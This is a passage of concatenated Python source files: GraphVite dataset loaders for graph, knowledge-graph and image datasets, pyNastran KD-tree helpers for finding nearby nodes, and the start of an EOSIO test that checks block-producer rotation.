If it is a str, use the last hidden model of that model.
batch_size (int, optional): batch size
"""
import torch
import torchvision
from torch import nn
logger.info("computing %s feature" % model)
if isinstance(model, str):
full_model = getattr(torchvision.models, model)(pretrained=True)
model = nn.Sequential(*list(full_model.children())[:-1])
num_worker = multiprocessing.cpu_count()
data_loader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size, num_workers=num_worker, shuffle=False)
model = model.cuda()
model.eval()
features = []
with torch.no_grad():
for i, (batch_images, batch_labels) in enumerate(data_loader):
if i % 100 == 0:
logger.info("%g%%" % (100.0 * i * batch_size / len(dataset)))
batch_images = batch_images.cuda()
batch_features = model(batch_images).view(batch_images.size(0), -1).cpu().numpy()
features.append(batch_features)
features = np.concatenate(features)
return features
class BlogCatalog(Dataset):
"""
BlogCatalog social network dataset.
Splits:
graph, label, train, test
Train and test splits are used for link prediction purpose.
"""
def __init__(self):
super(BlogCatalog, self).__init__(
"blogcatalog",
urls={
"graph": "http://socialcomputing.asu.edu/uploads/1283153973/BlogCatalog-dataset.zip",
"label": "http://socialcomputing.asu.edu/uploads/1283153973/BlogCatalog-dataset.zip",
"train": [], # depends on `graph`
"valid": [], # depends on `graph`
"test": [] # depends on `graph`
},
members={
"graph": "BlogCatalog-dataset/data/edges.csv",
"label": "BlogCatalog-dataset/data/group-edges.csv"
}
)
def graph_preprocess(self, raw_file, save_file):
self.csv2txt(raw_file, save_file)
def label_preprocess(self, raw_file, save_file):
self.csv2txt(raw_file, save_file)
def train_preprocess(self, train_file):
valid_file = train_file[:train_file.rfind("train.txt")] + "valid.txt"
test_file = train_file[:train_file.rfind("train.txt")] + "test.txt"
self.link_prediction_split(self.graph, [train_file, valid_file, test_file], portions=[100, 1, 1])
def valid_preprocess(self, valid_file):
train_file = valid_file[:valid_file.rfind("valid.txt")] + "train.txt"
test_file = valid_file[:valid_file.rfind("valid.txt")] + "test.txt"
self.link_prediction_split(self.graph, [train_file, valid_file, test_file], portions=[100, 1, 1])
def test_preprocess(self, test_file):
train_file = test_file[:test_file.rfind("test.txt")] + "train.txt"
valid_file = test_file[:test_file.rfind("test.txt")] + "valid.txt"
self.link_prediction_split(self.graph, [train_file, valid_file, test_file], portions=[100, 1, 1])
class Youtube(Dataset):
"""
Youtube social network dataset.
Splits:
graph, label
"""
def __init__(self):
super(Youtube, self).__init__(
"youtube",
urls={
"graph": "http://socialnetworks.mpi-sws.mpg.de/data/youtube-links.txt.gz",
"label": "http://socialnetworks.mpi-sws.mpg.de/data/youtube-groupmemberships.txt.gz"
}
)
def label_preprocess(self, raw_file, save_file):
self.top_k_label(raw_file, save_file, k=47)
class Flickr(Dataset):
"""
Flickr social network dataset.
Splits:
graph, label
"""
def __init__(self):
super(Flickr, self).__init__(
"flickr",
urls={
"graph": "http://socialnetworks.mpi-sws.mpg.de/data/flickr-links.txt.gz",
"label": "http://socialnetworks.mpi-sws.mpg.de/data/flickr-groupmemberships.txt.gz"
}
)
def label_preprocess(self, label_file, save_file):
self.top_k_label(label_file, save_file, k=5)
class Hyperlink2012(Dataset):
"""
Hyperlink 2012 graph dataset.
Splits:
pld_train, pld_test
"""
def __init__(self):
super(Hyperlink2012, self).__init__(
"hyperlink2012",
urls={
"pld_train": "http://data.dws.informatik.uni-mannheim.de/hyperlinkgraph/2012-08/pld-arc.gz",
"pld_valid": "http://data.dws.informatik.uni-mannheim.de/hyperlinkgraph/2012-08/pld-arc.gz",
"pld_test": "http://data.dws.informatik.uni-mannheim.de/hyperlinkgraph/2012-08/pld-arc.gz"
}
)
def pld_train_preprocess(self, graph_file, train_file):
valid_file = train_file[:train_file.rfind("pld_train.txt")] + "pld_valid.txt"
test_file = train_file[:train_file.rfind("pld_train.txt")] + "pld_test.txt"
self.link_prediction_split(graph_file, [train_file, valid_file, test_file], portions=[10000, 1, 1])
def pld_valid_preprocess(self, graph_file, valid_file):
train_file = valid_file[:valid_file.rfind("pld_valid.txt")] + "pld_train.txt"
test_file = valid_file[:valid_file.rfind("pld_valid.txt")] + "pld_test.txt"
self.link_prediction_split(graph_file, [train_file, valid_file, test_file], portions=[10000, 1, 1])
def pld_test_preprocess(self, graph_file, test_file):
train_file = test_file[:test_file.rfind("pld_test.txt")] + "pld_train.txt"
valid_file = test_file[:test_file.rfind("pld_test.txt")] + "pld_valid.txt"
self.link_prediction_split(graph_file, [train_file, valid_file, test_file], portions=[10000, 1, 1])
class Friendster(Dataset):
"""
Friendster social network dataset.
Splits:
graph, small_graph, label
"""
def __init__(self):
super(Friendster, self).__init__(
"friendster",
urls={
"graph": "https://snap.stanford.edu/data/bigdata/communities/com-friendster.ungraph.txt.gz",
"small_graph": ["https://snap.stanford.edu/data/bigdata/communities/com-friendster.ungraph.txt.gz",
"https://snap.stanford.edu/data/bigdata/communities/com-friendster.all.cmty.txt.gz"],
"label": "https://snap.stanford.edu/data/bigdata/communities/com-friendster.top5000.cmty.txt.gz"
}
)
def small_graph_preprocess(self, graph_file, label_file, save_file):
self.induced_graph(graph_file, label_file, save_file)
def label_preprocess(self, label_file, save_file):
self.top_k_label(label_file, save_file, k=100, format="(label)-nodes")
class Wikipedia(Dataset):
"""
Wikipedia dump for word embedding.
Splits:
graph
"""
def __init__(self):
super(Wikipedia, self).__init__(
"wikipedia",
urls={
"graph": "https://www.dropbox.com/s/mwt4uu1qu9fflfk/enwiki-latest-pages-articles-sentences.txt.gz?dl=1"
}
)
class Math(Dataset):
"""
Synthetic math knowledge graph dataset.
Splits:
train, valid, test
"""
NUM_ENTITY = 1000
NUM_RELATION = 30
OPERATORS = [
("+", lambda x, y: (x + y) % Math.NUM_ENTITY),
("-", lambda x, y: (x - y) % Math.NUM_ENTITY),
("*", lambda x, y: (x * y) % Math.NUM_ENTITY),
("/", lambda x, y: x // y),
("%", lambda x, y: x % y)
]
def __init__(self):
super(Math, self).__init__(
"math",
urls={
"train": [],
"valid": [],
"test": []
}
)
def train_preprocess(self, save_file):
np.random.seed(1023)
self.generate_math(save_file, num_triplet=20000)
def valid_preprocess(self, save_file):
np.random.seed(1024)
self.generate_math(save_file, num_triplet=1000)
def test_preprocess(self, save_file):
np.random.seed(1025)
self.generate_math(save_file, num_triplet=1000)
def generate_math(self, save_file, num_triplet):
with open(save_file, "w") as fout:
for _ in range(num_triplet):
i = int(np.random.rand() * len(self.OPERATORS))
op, f = self.OPERATORS[i]
x = int(np.random.rand() * self.NUM_ENTITY)
y = int(np.random.rand() * self.NUM_RELATION) + 1
fout.write("%d\t%s%d\t%d\n" % (x, op, y, f(x, y)))
class FB15k(Dataset):
"""
FB15k knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(FB15k, self).__init__(
"fb15k",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k/test.txt"
}
)
class FB15k237(Dataset):
"""
FB15k-237 knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(FB15k237, self).__init__(
"fb15k-237",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k-237/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k-237/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k-237/test.txt"
}
)
class WN18(Dataset):
"""
WN18 knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(WN18, self).__init__(
"wn18",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18/test.txt"
}
)
class WN18RR(Dataset):
"""
WN18RR knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(WN18RR, self).__init__(
"wn18rr",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18rr/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18rr/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18rr/test.txt"
}
)
class Wikidata5m(Dataset):
"""
Wikidata5m knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(Wikidata5m, self).__init__(
"wikidata5m",
urls={
"train": "https://www.dropbox.com/s/dty6ufe1gg6keuc/wikidata5m.txt.gz?dl=1",
"valid": "https://www.dropbox.com/s/dty6ufe1gg6keuc/wikidata5m.txt.gz?dl=1",
"test": "https://www.dropbox.com/s/dty6ufe1gg6keuc/wikidata5m.txt.gz?dl=1",
"entity": "https://www.dropbox.com/s/bgmgvk8brjwpc9w/entity.txt.gz?dl=1",
"relation": "https://www.dropbox.com/s/37jxki93gguv0pp/relation.txt.gz?dl=1",
"alias2entity": [], # depends on `entity`
"alias2relation": [] # depends on `relation`
}
)
def train_preprocess(self, graph_file, train_file):
valid_file = train_file[:train_file.rfind("train.txt")] + "valid.txt"
test_file = train_file[:train_file.rfind("train.txt")] + "test.txt"
self.edge_split(graph_file, [train_file, valid_file, test_file], portions=[4000, 1, 1])
def valid_preprocess(self, graph_file, valid_file):
train_file = valid_file[:valid_file.rfind("valid.txt")] + "train.txt"
test_file = valid_file[:valid_file.rfind("valid.txt")] + "test.txt"
self.edge_split(graph_file, [train_file, valid_file, test_file], portions=[4000, 1, 1])
def test_preprocess(self, graph_file, test_file):
train_file = test_file[:test_file.rfind("valid.txt")] + "train.txt"
valid_file = test_file[:test_file.rfind("train.txt")] + "valid.txt"
self.edge_split(graph_file, [train_file, valid_file, test_file], portions=[4000, 1, 1])
def load_alias(self, alias_file):
alias2object = {}
ambiguous = set()
with open(alias_file, "r") as fin:
for line in fin:
tokens = line.strip().split("\t")
object = tokens[0]
for alias in tokens[1:]:
if alias in alias2object and alias2object[alias] != object:
ambiguous.add(alias)
alias2object[alias] = object
for alias in ambiguous:
alias2object.pop(alias)
return alias2object
def alias2entity_preprocess(self, save_file):
return self.load_alias(self.entity)
def alias2relation_preprocess(self, save_file):
return self.load_alias(self.relation)
class Freebase(Dataset):
"""
Freebase knowledge graph dataset.
Splits:
train
"""
def __init__(self):
super(Freebase, self).__init__(
"freebase",
urls={
"train": "http://commondatastorage.googleapis.com/freebase-public/rdf/freebase-rdf-latest.gz"
}
)
class MNIST(Dataset):
"""
MNIST dataset for visualization.
Splits:
train_image_data, train_label_data, test_image_data, test_label_data, image_data, label_data
"""
def __init__(self):
super(MNIST, self).__init__(
"mnist",
urls={
"train_image_data": "http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz",
"train_label_data": "http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz",
"test_image_data": "http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz",
"test_label_data": "http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz",
"image_data": [], # depends on `train_image_data` & `test_image_data`
"label_data": [] # depends on `train_label_data` & `test_label_data`
}
)
def train_image_data_preprocess(self, raw_file, save_file):
images = np.fromfile(raw_file, dtype=np.uint8)
return images[16:].reshape(-1, 28*28)
def train_label_data_preprocess(self, raw_file, save_file):
labels = np.fromfile(raw_file, dtype=np.uint8)
return labels[8:]
test_image_data_preprocess = train_image_data_preprocess
test_label_data_preprocess = train_label_data_preprocess
def image_data_preprocess(self, save_file):
return np.concatenate([self.train_image_data, self.test_image_data])
def label_data_preprocess(self, save_file):
return np.concatenate([self.train_label_data, self.test_label_data])
class CIFAR10(Dataset):
"""
CIFAR10 dataset for visualization.
Splits:
train_image_data, train_label_data, test_image_data, test_label_data, image_data, label_data
"""
def __init__(self):
super(CIFAR10, self).__init__(
"cifar10",
urls={
"train_image_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"train_label_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"test_image_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"test_label_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"image_data": [], # depends on `train_image_data` & `test_image_data`
"label_data": [] # depends on `train_label_data` & `test_label_data`
},
)
def load_images(self, *batch_files):
images = []
for batch_file in batch_files:
batch = np.fromfile(batch_file, dtype=np.uint8)
batch = batch.reshape(-1, 32*32*3 + 1)
images.append(batch[:, 1:])
return np.concatenate(images)
def load_labels(self, meta_file, *batch_files):
classes = []
with open(meta_file, "r") as fin:
for line in fin:
line = line.strip()
if line:
classes.append(line)
classes = np.asarray(classes)
labels = []
for batch_file in batch_files:
batch = np.fromfile(batch_file, dtype=np.uint8)
batch = batch.reshape(-1, 32*32*3 + 1)
labels.append(batch[:, 0])
return classes[np.concatenate(labels)]
def train_image_data_preprocess(self, raw_path, save_file):
batch_files = glob.glob(os.path.join(raw_path, "cifar-10-batches-bin/data_batch_*.bin"))
return self.load_images(*batch_files)
def train_label_data_preprocess(self, raw_path, save_file):
meta_file = os.path.join(raw_path, "cifar-10-batches-bin/batches.meta.txt")
batch_files = glob.glob(os.path.join(raw_path, "cifar-10-batches-bin/data_batch_*.bin"))
return self.load_labels(meta_file, *batch_files)
def test_image_data_preprocess(self, raw_path, save_file):
batch_file = os.path.join(raw_path, "cifar-10-batches-bin/test_batch.bin")
return self.load_images(batch_file)
def test_label_data_preprocess(self, raw_path, save_file):
meta_file = os.path.join(raw_path, "cifar-10-batches-bin/batches.meta.txt")
batch_file = os.path.join(raw_path, "cifar-10-batches-bin/test_batch.bin")
return self.load_labels(meta_file, batch_file)
def image_data_preprocess(self, save_file):
return np.concatenate([self.train_image_data, self.test_image_data])
def label_data_preprocess(self, save_file):
return np.concatenate([self.train_label_data, self.test_label_data])
class ImageNet(Dataset):
"""
ImageNet dataset for visualization.
Splits:
train_image, train_feature_data, train_label, train_hierarchical_label,
valid_image, valid_feature_data, valid_label, valid_hierarchical_label
"""
def __init__(self):
super(ImageNet, self).__init__(
"imagenet",
urls={
"train_image": "http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_img_train.tar",
"train_feature_data": [], # depends on `train_image`
"train_label": [], # depends on `train_image`
"train_hierarchical_label": [], # depends on `train_image`
"valid_image": ["http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_img_val.tar",
"http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_devkit_t12.tar.gz"],
"valid_feature_data": [], # depends on `valid_image`
"valid_label": "http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_devkit_t12.tar.gz",
"valid_hierarchical_label":
"http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_devkit_t12.tar.gz",
"feature_data": [], # depends on `train_feature_data` & `valid_feature_data`
"label": [], # depends on `train_label` & `valid_label`
"hierarchical_label": [], # depends on `train_hierarchical_label` & `valid_hierarchical_label`
}
)
def import_wordnet(self):
import nltk
try:
nltk.data.find("corpora/wordnet")
except LookupError:
nltk.download("wordnet")
from nltk.corpus import wordnet
try:
wordnet.synset_from_pos_and_offset
except AttributeError:
wordnet.synset_from_pos_and_offset = wordnet._synset_from_pos_and_offset
return wordnet
def get_name(self, synset):
name = synset.name()
return name[:name.find(".")]
def readable_label(self, labels, save_file, hierarchy=False):
wordnet = self.import_wordnet()
if hierarchy:
logger.info("generating human-readable hierarchical labels")
else:
logger.info("generating human-readable labels")
synsets = []
for label in labels:
pos = label[0]
offset = int(label[1:])
synset = wordnet.synset_from_pos_and_offset(pos, offset)
synsets.append(synset)
depth = max([synset.max_depth() for synset in synsets])
num_sample = len(synsets)
labels = [self.get_name(synset) for synset in synsets]
num_class = len(set(labels))
hierarchies = [labels]
while hierarchy and num_class > 1:
depth -= 1
for i in range(num_sample):
if synsets[i].max_depth() > depth:
# only takes the first recall
synsets[i] = synsets[i].hypernyms()[0]
labels = [self.get_name(synset) for synset in synsets]
hierarchies.append(labels)
num_class = len(set(labels))
hierarchies = hierarchies[::-1]
with open(save_file, "w") as fout:
for hierarchy in zip(*hierarchies):
fout.write("%s\n" % "\t".join(hierarchy))
def image_feature_data(self, image_path):
""""""
import torchvision
from torchvision import transforms
augmentation = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset = torchvision.datasets.ImageFolder(image_path, augmentation)
features = super(self, ImageNet).image_feature_data(dataset)
return features
def train_image_preprocess(self, image_path, save_file):
tar_files = glob.glob(os.path.join(image_path, "*.tar"))
if len(tar_files) == 0:
return image_path
for tar_file in tar_files:
self.extract(tar_file)
os.remove(tar_file)
return image_path
def train_feature_data_preprocess(self, save_file):
numpy_file = os.path.splitext(save_file)[0] + ".npy"
if os.path.exists(numpy_file):
return np.load(numpy_file)
features = self.image_feature_data(self.train_image)
np.save(numpy_file, features)
return features
def train_label_preprocess(self, save_file):
image_files = glob.glob(os.path.join(self.train_image, "*/*.JPEG"))
labels = [os.path.basename(os.path.dirname(image_file)) for image_file in image_files]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file)
def train_hierarchical_label_preprocess(self, save_file):
image_files = glob.glob(os.path.join(self.train_image, "*/*.JPEG"))
labels = [os.path.basename(os.path.dirname(image_file)) for image_file in image_files]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file, hierarchy=True)
def valid_image_preprocess(self, image_path, meta_path, save_file):
from scipy.io import loadmat
image_files = glob.glob(os.path.join(image_path, "*.JPEG"))
if len(image_files) == 0:
return image_path
logger.info("re-arranging images into sub-folders")
image_files = sorted(image_files)
meta_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/meta.mat")
id_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/ILSVRC2012_validation_ground_truth.txt")
metas = loadmat(meta_file, squeeze_me=True)["synsets"][:1000]
id2class = {meta[0]: meta[1] for meta in metas}
ids = np.loadtxt(id_file)
labels = [id2class[id] for id in ids]
for image_file, label in zip(image_files, labels):
class_path = os.path.join(image_path, label)
if not os.path.exists(class_path):
os.mkdir(class_path)
shutil.move(image_file, class_path)
return image_path
def valid_feature_data_preprocess(self, save_file):
numpy_file = os.path.splitext(save_file)[0] + ".npy"
if os.path.exists(numpy_file):
return np.load(numpy_file)
features = self.image_feature_data(self.valid_image)
np.save(numpy_file, features)
return features
def valid_label_preprocess(self, meta_path, save_file):
from scipy.io import loadmat
meta_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/meta.mat")
id_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/ILSVRC2012_validation_ground_truth.txt")
metas = loadmat(meta_file, squeeze_me=True)["synsets"][:1000]
id2class = {meta[0]: meta[1] for meta in metas}
ids = np.loadtxt(id_file, dtype=np.int32)
labels = [id2class[id] for id in ids]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file)
def valid_hierarchical_label_preprocess(self, meta_path, save_file):
from scipy.io import loadmat
meta_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/meta.mat")
id_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/ILSVRC2012_validation_ground_truth.txt")
metas = loadmat(meta_file, squeeze_me=True)["synsets"][:1000]
id2class = {meta[0]: meta[1] for meta in metas}
ids = np.loadtxt(id_file, dtype=np.int32)
labels = [id2class[id] for id in ids]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file, hierarchy=True)
def feature_data_preprocess(self, save_file):
return np.concatenate([self.train_feature_data, self.valid_feature_data])
def label_preprocess(self, save_file):
with open(save_file, "w") as fout:
with open(self.train_label, "r") as fin:
shutil.copyfileobj(fin, fout)
with open(save_file, "a") as fout:
with open(self.valid_label, "r") as fin:
shutil.copyfileobj(fin, fout)
def hierarchical_label_preprocess(self, save_file):
with open(save_file, "w") as fout:
with open(self.train_hierarchical_label, "r") as fin:
shutil.copyfileobj(fin, fout)
with open(self.valid_hierarchical_label, "r") as fin:
shutil.copyfileobj(fin, fout)
blogcatalog = BlogCatalog()
youtube = Youtube()
flickr = Flickr()
hyperlink2012 = Hyperlink2012()
friendster = Friendster()
wikipedia = Wikipedia()
math = Math()
fb15k = FB15k()
fb15k237 = FB15k237()
wn18 = WN18()
wn18rr = WN18RR()
wikidata5m = Wikidata5m()
freebase = Freebase()
mnist = MNIST()
cifar10 = CIFAR10()
imagenet = ImageNet()
__all__ = [
"Dataset",
"BlogCatalog", "Youtube", "Flickr", "Hyperlink2012", "Friendster", "Wikipedia",
"Math", "FB15k", "FB15k237", "WN18", "WN18RR", "Wikidata5m", "Freebase",
"MNIST", "CIFAR10", "ImageNet"
] |
the-stack_0_1639 | """
defines:
* nids_close = find_closest_nodes(nodes_xyz, nids, xyz_compare, neq_max, tol)
* ieq = find_closest_nodes_index(nodes_xyz, xyz_compare, neq_max, tol)
"""
from itertools import count
from typing import List, Optional
import numpy as np
from pyNastran.bdf.mesh_utils.bdf_equivalence import (
_get_tree)
def find_closest_nodes(nodes_xyz, nids, xyz_compare, neq_max=1, tol=None, msg=''):
# type: (np.ndarray, np.ndarray, np.ndarray, int, Optional[float], str) -> np.ndarray
"""
Finds the closest nodes to an arbitrary set of xyz points
Parameters
----------
nodes_xyz : (Nnodes, 3) float ndarray
the source points (e.g., xyz_cid0)
nids : (Nnodes, ) int ndarray
the source node ids (e.g.; nid_cp_cid[:, 0])
xyz_compare : (Ncompare, 3) float ndarray
the xyz points to compare to; xyz_to_find
tol : float; default=None
the max spherical tolerance
None : the whole model
neq_max : int; default=1.0
the number of "close" points
msg : str; default=''
custom message used for errors
Returns
-------
nids_close: (Ncompare, ) int ndarray
the close node ids
"""
if not isinstance(neq_max, int):
msgi = 'neq_max=%r must be an int; type=%s\n%s' % (
neq_max, type(neq_max), msg)
raise TypeError(msgi)
#ieq = find_closest_nodes_index(nodes_xyz, xyz_compare, neq_max, tol)
if tol is None:
xyz_max = nodes_xyz.max(axis=0)
xyz_min = nodes_xyz.min(axis=0)
assert len(xyz_max) == 3, xyz_max
dxyz = np.linalg.norm(xyz_max - xyz_min)
tol = 2. * dxyz
ieq = _not_equal_nodes_build_tree(nodes_xyz, xyz_compare, tol,
neq_max=neq_max, msg=msg)[1]
ncompare = xyz_compare.shape[0]
assert len(ieq) == ncompare, 'increase the tolerance so you can find nodes; tol=%r' % tol
try:
nids_out = nids[ieq]
except IndexError:
# if you get a crash while trying to create the error message
# check to see if your nodes are really far from each other
#
nnids = len(nids)
msgi = 'Cannot find:\n'
for i, ieqi, nid in zip(count(), ieq, nids):
if ieqi == nnids:
xyz = xyz_compare[i, :]
msgi += ' nid=%s xyz=%s\n' % (nid, xyz)
msgi += msg
raise IndexError(msgi)
return nids_out
def find_closest_nodes_index(nodes_xyz, xyz_compare, neq_max, tol, msg=''):
"""
Finds the closest nodes to an arbitrary set of xyz points
Parameters
----------
nodes_xyz : (Nnodes, 3) float ndarray
the source points
xyz_compare : (Ncompare, 3) float ndarray
the xyz points to compare to
neq_max : int
the number of "close" points (default=4)
tol : float
the max spherical tolerance
msg : str; default=''
error message
Returns
-------
slots : (Ncompare, ) int ndarray
the indices of the close nodes corresponding to nodes_xyz
"""
#nodes_xyz, model, nids, inew = _eq_nodes_setup(
#bdf_filename, tol, renumber_nodes=renumber_nodes,
#xref=xref, node_set=node_set, debug=debug)
ieq, slots = _not_equal_nodes_build_tree(nodes_xyz, xyz_compare, tol,
neq_max=neq_max, msg=msg)[1:3]
return ieq
def _not_equal_nodes_build_tree(nodes_xyz, xyz_compare, tol, neq_max=4, msg=''):
# type: (np.ndarray, np.ndarray, float, int, str) -> (Any, np.ndarray, np.ndarray)
"""
helper function for `bdf_equivalence_nodes`
Parameters
----------
nodes_xyz : (Nnodes, 3) float ndarray
the source points
xyz_compare : (Ncompare, 3) float ndarray
the xyz points to compare to
tol : float
the max spherical tolerance
neq_max : int; default=4
the number of close nodes
msg : str; default=''
error message
Returns
-------
kdt : cKDTree()
the kdtree object
ieq : int ndarray
The indices of nodes_xyz where the nodes in xyz_compare are close???
neq_max = 1:
(N, ) int ndarray
neq_max > 1:
(N, N) int ndarray
slots : int ndarray
The indices of nodes_xyz where the nodes in xyz_compare are close???
neq_max = 1:
(N, ) int ndarray
neq_max > 1:
(N, N) int ndarray
msg : str; default=''
error message
"""
assert isinstance(xyz_compare, np.ndarray), type(xyz_compare)
if nodes_xyz.shape[1] != xyz_compare.shape[1]:
msgi = 'nodes_xyz.shape=%s xyz_compare.shape=%s%s' % (
str(nodes_xyz.shape), str(xyz_compare.shape), msg)
raise RuntimeError(msgi)
kdt = _get_tree(nodes_xyz, msg=msg)
# check the closest 10 nodes for equality
deq, ieq = kdt.query(xyz_compare, k=neq_max, distance_upper_bound=tol)
#print(deq)
#print('ieq =', ieq)
#print('neq_max = %s' % neq_max)
# get the ids of the duplicate nodes
nnodes = nodes_xyz.shape[0]
if neq_max == 1:
assert len(deq.shape) == 1, deq.shape
slots = np.where(ieq < nnodes)
else:
assert len(deq.shape) == 2, deq.shape
slots = np.where(ieq[:, :] < nnodes)
#print('slots =', slots)
return kdt, ieq, slots
|
the-stack_0_1640 | #!/usr/bin/env python3
from testUtils import Utils
import testUtils
from Cluster import Cluster
from WalletMgr import WalletMgr
from Node import Node
from TestHelper import TestHelper
import decimal
import math
import re
import time
###############################################################
# nodeos_voting_test
# --dump-error-details <Upon error print etc/eosio/node_*/config.ini and var/lib/node_*/stderr.log to stdout>
# --keep-logs <Don't delete var/lib/node_* folders upon test completion>
###############################################################
class ProducerToNode:
map={}
@staticmethod
def populate(node, num):
for prod in node.producers:
ProducerToNode.map[prod]=num
Utils.Print("Producer=%s for nodeNum=%s" % (prod,num))
def isValidBlockProducer(prodsActive, blockNum, node):
blockProducer=node.getBlockProducerByNum(blockNum)
if blockProducer not in prodsActive:
return False
return prodsActive[blockProducer]
def validBlockProducer(prodsActive, prodsSeen, blockNum, node):
blockProducer=node.getBlockProducerByNum(blockNum)
if blockProducer not in prodsActive:
Utils.cmdError("unexpected block producer %s at blockNum=%s" % (blockProducer,blockNum))
Utils.errorExit("Failed because of invalid block producer")
if not prodsActive[blockProducer]:
Utils.cmdError("block producer %s for blockNum=%s not elected, belongs to node %s" % (blockProducer, blockNum, ProducerToNode.map[blockProducer]))
Utils.errorExit("Failed because of incorrect block producer")
prodsSeen[blockProducer]=True
def setActiveProducers(prodsActive, activeProducers):
for prod in prodsActive:
prodsActive[prod]=prod in activeProducers
def verifyProductionRounds(trans, node, prodsActive, rounds):
blockNum=node.getNextCleanProductionCycle(trans)
Utils.Print("Validating blockNum=%s" % (blockNum))
temp=Utils.Debug
Utils.Debug=False
Utils.Print("FIND VALID BLOCK PRODUCER")
blockProducer=node.getBlockProducerByNum(blockNum)
lastBlockProducer=blockProducer
adjust=False
while not isValidBlockProducer(prodsActive, blockNum, node):
adjust=True
blockProducer=node.getBlockProducerByNum(blockNum)
if lastBlockProducer!=blockProducer:
Utils.Print("blockProducer=%s for blockNum=%s is for node=%s" % (blockProducer, blockNum, ProducerToNode.map[blockProducer]))
lastBlockProducer=blockProducer
blockNum+=1
Utils.Print("VALID BLOCK PRODUCER")
saw=0
sawHigh=0
startingFrom=blockNum
doPrint=0
invalidCount=0
while adjust:
invalidCount+=1
if lastBlockProducer==blockProducer:
saw+=1;
else:
if saw>=12:
startingFrom=blockNum
if saw>12:
Utils.Print("ERROR!!!!!!!!!!!!!! saw=%s, blockProducer=%s, blockNum=%s" % (saw,blockProducer,blockNum))
break
else:
if saw > sawHigh:
sawHigh = saw
Utils.Print("sawHigh=%s" % (sawHigh))
if doPrint < 5:
doPrint+=1
Utils.Print("saw=%s, blockProducer=%s, blockNum=%s" % (saw,blockProducer,blockNum))
lastBlockProducer=blockProducer
saw=1
blockProducer=node.getBlockProducerByNum(blockNum)
blockNum+=1
if adjust:
blockNum-=1
Utils.Print("ADJUSTED %s blocks" % (invalidCount-1))
prodsSeen=None
Utils.Print("Verify %s complete rounds of all producers producing" % (rounds))
for i in range(0, rounds):
prodsSeen={}
lastBlockProducer=None
for j in range(0, 21):
# each new set of 12 blocks should have a different blockProducer
if lastBlockProducer is not None and lastBlockProducer==node.getBlockProducerByNum(blockNum):
Utils.cmdError("expected blockNum %s to be produced by any of the valid producers except %s" % (blockNum, lastBlockProducer))
Utils.errorExit("Failed because of incorrect block producer order")
# make sure that the next set of 12 blocks all have the same blockProducer
lastBlockProducer=node.getBlockProducerByNum(blockNum)
for k in range(0, 12):
validBlockProducer(prodsActive, prodsSeen, blockNum, node1)
blockProducer=node.getBlockProducerByNum(blockNum)
if lastBlockProducer!=blockProducer:
printStr=""
newBlockNum=blockNum-18
for l in range(0,36):
printStr+="%s" % (newBlockNum)
printStr+=":"
newBlockProducer=node.getBlockProducerByNum(newBlockNum)
printStr+="%s" % (newBlockProducer)
printStr+=" "
newBlockNum+=1
Utils.cmdError("expected blockNum %s (started from %s) to be produced by %s, but produded by %s: round=%s, prod slot=%s, prod num=%s - %s" % (blockNum, startingFrom, lastBlockProducer, blockProducer, i, j, k, printStr))
Utils.errorExit("Failed because of incorrect block producer order")
blockNum+=1
# make sure that we have seen all 21 producers
prodsSeenKeys=prodsSeen.keys()
if len(prodsSeenKeys)!=21:
